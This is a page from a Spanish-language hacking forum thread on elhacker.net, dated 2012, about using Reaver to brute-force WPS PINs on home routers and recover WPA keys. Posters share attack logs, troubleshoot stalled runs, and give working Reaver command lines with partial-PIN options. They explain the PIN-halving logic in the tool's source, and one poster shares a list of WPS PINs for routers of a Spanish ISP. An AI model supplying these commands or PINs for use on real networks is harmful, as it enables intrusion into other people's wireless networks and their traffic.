elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux (Moderador: ChimoC)
| | | |-+  REAVER: Vulnerabilidad de WPA por WPS habilitado
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 ... 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 [57] 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 ... 92 Ir Abajo Respuesta Imprimir
Autor Tema: REAVER: Vulnerabilidad de WPA por WPS habilitado  (Leído 490,204 veces)
GOolden

Desconectado Desconectado

Mensajes: 172



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #784 en: 25 Noviembre 2012, 22:31 »

Hola tengo un router de vodafone  mac 64:16:F0 y realizando el ataque me sale esto
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 84405678 va cambiando de pin y todo pero con este mensaje sacare la clave de mi router o no que opinais
En línea

P4nd3m0n1um


Desconectado Desconectado

Mensajes: 1.379



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #785 en: 26 Noviembre 2012, 00:09 »

@GOolden: según tacnetsol, estas muy lejos del AP, tienes que estar mas próximo, con unos -59dB.-
En línea

metrillo

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #786 en: 26 Noviembre 2012, 08:42 »

Wenas yo tengo una duda,llevo dos dias usando reaver con wifiway 3.4 cuando me aburro guardo sesion,ledoy a salvar sesion reaver,crea un archivo xzm (creo) ,ese arcgivo lo guardo en un pen,al dia siguiente al iniciar el wifiway inserto el pen cojo el archivo guardado lo coloco en elescritorio del wifiway,clico dos veces me pone algo de succesfull,escribo el comnando del reaver y me dice q si quiero seguir por donde lo deje y le doy a yes,mi pregunta es ¿realmente sigue por donde lo he dejado? quiero decir q si los pin q anteriormente ha probado el reaver se quedan guardados o tengo q coger el otro archivo q se crea con la extensión wpc o algo parecido(es donde salen los pin).El caso es q si restaura la sección por q voy por el 26,50 pero no se si vuelve a repetir los pin,solo preguntar si tengo q poner algun comando extra o no,y tambien me sale a cada rato esto:
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Receive timeout occurred
Trying pin 84405678
 M2 message
Sending M2 message
Gracias y perdon por el tocho
En línea

P4nd3m0n1um


Desconectado Desconectado

Mensajes: 1.379



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #787 en: 26 Noviembre 2012, 08:52 »

El archivo wpc guarda tanto el diccionario como el estado del mismo.
En línea

GOolden

Desconectado Desconectado

Mensajes: 172



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #788 en: 26 Noviembre 2012, 18:34 »

El router no lo tengo lejos por que yo estoy en la planta de arriba y el router esta pared con pared asin esta al lado este es el fabricante del router Shehzhen Huawei y como veis me envia un m6 y no pasa al 90% no se que pasara al final si me dara el pin ahh tengo una alfa que es la tipica que utiliza casi todo el mundo voy por el 50% va avanzando lentamente y se queda parado siempre y hay que ponerlo otra vez para otra vez vuelva a subir el porcentaje bueno saludos
En línea

capitanfanegas

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #789 en: 27 Noviembre 2012, 19:35 »

Módulo beta3, para el error del 99.99% probado en wifislax usb-live, resultado el mismo:
Código:
[+] 99.99% completado @ 2012-11-27 11:30:23 (14 segundos/pin)
[+] Probando pin XXXX9983
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[+] Probando pin XXXX9982
[+] Enviando requirimiento EAPOL
[+] Received identity request
[+] Enviando respuesta de identidad
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Probando pin XXXX9981
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[-] Fallo al recuperar el pin WPS.
wifislax ~ # 8C:0C:A3:XX:XX:XX
bash: 8C:0C:A3:XX:XX:XX: command not found
wifislax ~ #
wifislax ~ #
Módulo, el beta3, extraído del enlace puesto por warcry, 7 post más arriba, del foro seguridad wireless, me llama la atención que no intenta los pines del xxxx9999 al xxxx9990, saludos.

P.D. Las "X" corresponden a dígitos que he ocultado por temas de privacidad.
« Última modificación: 27 Noviembre 2012, 19:36 por capitanfanegas » En línea

HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #790 en: 27 Noviembre 2012, 20:39 »

¿has usado el -p XXXX?Parece ser que es obligatorio si usas la "nueva" modificación.
Las x corresponden a los cuatro primeros números del pin...

# sudo reaver -i eth1 -b ff:ff:ff:ff:ff --no-checksum -p XXXX -vv

Estaba pensando que si llegas al M6,entonces teóricamente los 6 primeros números del pin ya están chekeados....por lo tanto sólo quedarían 100 posibles combinaciones...desde XXXXXX00 hasta XXXXXX99...quizá probando -p xxxxxx con los 6 dígitos te funciona...lo ignoro porque no lo he probado( y ni siquiera sé si es posible hacerlo)...mas que nada porque todavía no me he encontrado con un router de estos para comprobarlo.Aunque así sería sencillísimo llegados al M7...pero tampoco hay manera por lo que he leido en google code.

En el código aportado por el autor(thanks Stefano)hay una modificación que estoy mirando con eclipse,intentando comprender qué y para qué....básicamente obliga a seguir a reaver a seguir probando pines ignorando el bug que tira del 99%...

  int i = 0, index = 0;

   /* If the first half of the pin was not specified, generate a list of possible pins */
   if(!get_static_p1())
Si no introduces la primera mitad del pin,se genera una lista con los posibles pins...y ahí es dónde creo que se produce el error,porque en esa lista generada no debe aparecer ese pin....si no,no lo entiendo.

else
   {
      /* If the first half of the pin was specified by the user, only use that */
      for(index=0; index<P1_SIZE; index++) 
      {
         set_p1(index, get_static_p1());
      }
   }

Si  la 1ª mitad del pin la especifica el usuario,se incrementa en una unidad cada petición de pin...
Etc,etc,etc.......
La sentencia else se lanza  en caso de que el anterior parámetro sea nulo y así dar una alternativa...
Aunque quizá estoy equivocado...

En fin...un rollo
En línea

Todo lo que digan que somos,
lo somos y aún peor.
capitanfanegas

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #791 en: 27 Noviembre 2012, 23:08 »

Exacto he utilizado el siguiente comando:

   #reaver-wifislax -i mon0 -b 8c:0c:a3:xx:xx:xx -p XXXX -vv

Lo que no he utilizado es el parámetro "--no-checksum", "-p XXXX" son los 4 primeros dígitos obtenidos por la versión reaver standard, y que provocan el salto al 90.94% , cuando los detecta como válidos porque integran el Pin, en sus 4 primeras posiciones. También es cierto que se lleva, en casi 20 horas que me ha llevado la auditoría, 14 o 15 con el porcentaje del 99.99%, pero cambiando los pines, eso sí, pero nada, no entiendo de programación así que poco puedo aportar sobre tus comentarios sobre el código fuente.
« Última modificación: 27 Noviembre 2012, 23:12 por capitanfanegas » En línea

ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #792 en: 28 Noviembre 2012, 10:35 »

Buenas:

Por favor, si estáis testeando el reaver-wifislax de módulo para bug de 99%, os rogaría que posteáseis en su post https://foro.elhacker.net/wireless_en_linux/reaverwifislax_mod_para_problema_99-t376970.0.html

USUARINUEVO está retocandoi el código, así que por favor, id poniendo ahí los errores que observéis

Saludos

ChimoC
En línea

GOolden

Desconectado Desconectado

Mensajes: 172



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #793 en: 28 Noviembre 2012, 22:17 »

Hola alguien ha probado el reaver modificado con la 8c:0c:a3 de telefonica o alguna livebox por que alomejor con la modificada se corrigen fallos que antes habia ahh sabeis como se mete el reaver modificado al wifislax 4.3 no se como hacerlo saludos
En línea

P4nd3m0n1um


Desconectado Desconectado

Mensajes: 1.379



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #794 en: 29 Noviembre 2012, 00:21 »

Para los que andaban buscando de ONO les doy una donación:

00446747, 19482417, 31547208, 49945386, 39149138, 45445402, 6793XXXX, 6557XXXX, 4354XXXX, 04300106, 37523077, 80324560, 19756967.
En línea

adrihamel

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #795 en: 2 Diciembre 2012, 01:22 »

Hola, acabo de ver en las redes que detecto una onoXXXX con mac 84:1B:5E. Yo nunca antes habia visto esta mac en ONO. Son las nuevas que estan instalando? tiene el wps activado, sera vulnerable al ataque reaver? que fabricante es? salu2
En línea

P4nd3m0n1um


Desconectado Desconectado

Mensajes: 1.379



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #796 en: 2 Diciembre 2012, 02:09 »

Hola, acabo de ver en las redes que detecto una onoXXXX con mac 84:1B:5E. Yo nunca antes habia visto esta mac en ONO. Son las nuevas que estan instalando?

NOSE..

tiene el wps activado, sera vulnerable al ataque reaver?

CLARO..

que fabricante es? salu2

NETGEAR Inc.
En línea

vittorio

Desconectado Desconectado

Mensajes: 242


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #797 en: 4 Diciembre 2012, 12:45 »

Me he bajado el bacttrack5 desde la web y no soy capaz una vez grabado que el ordenador arranque con el disco metido. Desde el BT4 arranca sin problemas. He quemado no se cuantos dvd,s y casi me doy por vencido. Quizas la descarga no la realizo correctamente o no es la version que tengo que descargar.
Tengo W7
Gracias por la ayuda
En línea

Páginas: 1 ... 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 [57] 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 ... 92 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dhcp no habilitado
Hacking Wireless
garlo 4 3,029 Último mensaje 18 Abril 2008, 20:01
por ChimoC
Intrucion Iss 6.0 con put habilitado
Nivel Web
hdbreaker 1 1,858 Último mensaje 29 Diciembre 2010, 03:41
por APOKLIPTICO
Reaver Pro [Reaver-WPS Pro Edition Live DVD] « 1 2 ... 6 7 »
Wireless en Linux
P4nd3m0n1um 94 54,181 Último mensaje 21 Mayo 2014, 20:20
por elmatador25
Desinstalar reaver 1.4 e instalar reaver 1.3 en wifislax
Wireless en Linux
fjarias 5 3,672 Último mensaje 31 Octubre 2012, 21:24
por MEGAHOM
Reaver Automated Scripts (Scripts de Automatización de Reaver-WPS)
Wireless en Linux
P4nd3m0n1um 0 4,937 Último mensaje 11 Noviembre 2012, 04:34
por P4nd3m0n1um
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines